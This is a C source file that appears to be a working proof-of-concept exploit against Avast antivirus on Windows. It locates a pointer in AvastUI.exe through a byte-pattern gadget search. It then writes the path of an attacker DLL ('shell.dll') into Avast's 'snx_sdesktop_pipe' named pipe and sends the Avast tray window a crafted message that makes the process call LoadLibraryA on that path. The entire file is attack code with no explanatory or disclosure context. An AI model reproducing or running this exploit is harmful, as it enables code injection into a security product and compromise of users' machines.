#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <winternl.h>
#include <strsafe.h>
#pragma comment( lib, "user32" )
PBYTE memmem( PBYTE haystack, SIZE_T hlen, PBYTE needle, SIZE_T nlen )
{
BYTE needle_first;
PBYTE p = haystack;
SIZE_T plen = hlen;
if ( !nlen )
return NULL;
needle_first = *needle;
while ( plen >= nlen && ( p = memchr( p, needle_first, plen - nlen + 1 ) ) )
{
if ( !memcmp( p, needle, nlen ) )
return p;
p++;
plen = hlen - ( p - haystack );
}
return NULL;
}
BOOL GetSectionInfo( PBYTE pModule, PBYTE szSectionName, PBYTE *ppSection, PDWORD pdwSectionSize )
{
PIMAGE_DOS_HEADER pDOSHeader;
PIMAGE_NT_HEADERS pNTHeaders;
PIMAGE_OPTIONAL_HEADER pOptionalHeader;
PIMAGE_SECTION_HEADER pSectionHeader;
UINT i;
*ppSection = NULL;
*pdwSectionSize = 0;
pDOSHeader = ( PIMAGE_DOS_HEADER )pModule;
if ( IMAGE_DOS_SIGNATURE != pDOSHeader->e_magic )
return FALSE;
pNTHeaders = ( PIMAGE_NT_HEADERS )( pModule + pDOSHeader->e_lfanew );
if ( IMAGE_NT_SIGNATURE != pNTHeaders->Signature )
return FALSE;
pOptionalHeader = ( PIMAGE_OPTIONAL_HEADER )( &pNTHeaders->OptionalHeader );
if ( IMAGE_NT_OPTIONAL_HDR_MAGIC != pOptionalHeader->Magic )
return FALSE;
pSectionHeader = ( PIMAGE_SECTION_HEADER )( ( PBYTE )pOptionalHeader + pNTHeaders->FileHeader.SizeOfOptionalHeader );
for ( i = 0; i < pNTHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++ )
{
if ( strcmp( pSectionHeader->Name, szSectionName ) == 0 )
{
DWORD dwSize = pSectionHeader->Misc.VirtualSize;
if ( dwSize % pOptionalHeader->SectionAlignment != 0 )
dwSize += pOptionalHeader->SectionAlignment - ( dwSize % pOptionalHeader->SectionAlignment );
*ppSection = pModule + pSectionHeader->VirtualAddress;
*pdwSectionSize = dwSize;
_tprintf( _T( "[?] %S: 0x%08Ix 0x%08x\n" ), pSectionHeader->Name, *ppSection, *pdwSectionSize );
return TRUE;
}
}
return FALSE;
}
static BYTE g_pbGadget[] = { 0x05, 0xff, 0xff, 0x55, 0x58 }; //add eax,-0A7AA0001h
int _tmain( int argc, TCHAR *argv[] )
{
HMODULE hAvastUI;
INT i;
PBYTE pSection;
DWORD dwSectionSize;
DWORD_PTR dwpGadget;
PBYTE pbNamedPipeStructure;
HANDLE hPipe, hWnd;
BYTE szDll[0x2c] = { 0 };
DWORD dwBytesWritten;
FARPROC pLoadLibraryA;
if ( 0 == GetCurrentDirectoryA( sizeof( szDll ), szDll ) )
{
_tprintf( _T( "[-] GetCurrentDirectoryA() failed (0x%08x)\n" ),
GetLastError() );
return 0;
}
if ( FAILED( StringCchCatA( szDll, sizeof( szDll ), "\\shell.dll" ) ) )
{
_tprintf( _T( "[-] StringCchCatA() failed\n" ) );
return 0;
}
hAvastUI = LoadLibraryEx( _T( "C:\\Program Files\\AVAST Software\\Avast\\AvastUI.exe" ),
0,
DONT_RESOLVE_DLL_REFERENCES );
_tprintf( _T( "[?] hAvastUI = 0x%08Ix\n" ), hAvastUI );
if ( FALSE == GetSectionInfo( ( PBYTE )hAvastUI, ".text", &pSection, &dwSectionSize ) )
{
_tprintf( _T( "[-] AvastUI.exe '.text' section not found\n" ) );
return 0;
}
dwpGadget = ( DWORD_PTR )memmem( pSection, dwSectionSize, g_pbGadget, sizeof( g_pbGadget ) );
dwpGadget -= 4;
pbNamedPipeStructure = *( PBYTE * )( dwpGadget );
_tprintf( _T( "[?] pbNamedPipeStructure = 0x%08Ix\n" ), pbNamedPipeStructure );
hWnd = FindWindow( _T( "asw_av_tray_icon_wndclass" ), 0 );
if ( NULL == hWnd )
{
_tprintf( _T( "[-] FindWindow() failed (0x%08x)\n" ),
GetLastError() );
return 0;
}
for ( i = 0; i < 10; i++ )
{
WaitNamedPipe( _T( "\\\\.\\pipe\\snx_sdesktop_pipe" ),
0xffffffff );
hPipe = CreateFile( _T( "\\\\.\\pipe\\snx_sdesktop_pipe" ),
GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL );
if ( INVALID_HANDLE_VALUE == hPipe )
{
_tprintf( _T( "[-] CreateFile() failed (0x%08x)\n" ),
GetLastError() );
return 0;
}
_tprintf( _T( "[?] Pipe successfully opened (%d)\n" ),
i );
if ( FALSE == WriteFile( hPipe,
szDll,
sizeof( szDll ),
&dwBytesWritten,
NULL ) || sizeof( szDll ) != dwBytesWritten )
{
_tprintf( _T( "[-] WriteFile() failed (0x%08x)\n" ),
GetLastError() );
return 0;
}
CloseHandle( hPipe );
}
pLoadLibraryA = GetProcAddress( GetModuleHandle( _T( "kernel32.dll" ) ),
"LoadLibraryA" );
SendMessage( hWnd,
0x83fd,
( WPARAM )pLoadLibraryA,
( LPARAM )pbNamedPipeStructure );
return 0;
}